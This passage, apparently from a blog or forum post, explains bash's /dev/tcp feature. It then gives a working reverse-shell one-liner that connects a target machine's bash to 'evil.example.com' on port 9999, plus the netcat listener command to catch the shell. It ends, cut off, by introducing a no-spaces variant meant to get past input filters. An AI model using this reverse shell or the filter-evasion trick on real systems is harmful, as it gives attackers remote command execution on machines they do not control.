Bash also has a little known feature that allows opening a tcp connection with the special filename: /dev/tcp/hostname/port. ``echo foo > /dev/tcp/example.com/9999'' will perform a DNS lookup for example.com, attempt to connect to TCP port 9999 of the resulting IP address, and send the string "foo" to the socket.
Putting these things together...
targetbox / $ /bin/bash 3<>/dev/tcp/evil.example.com/9999 <&3 >&3 &
and we've got a shell shoveler in pure bash, no outside executables. Catch it with:
evil / $ nc -l -p 9999
Same thing; pure bash, now with no spaces for getting around input filters: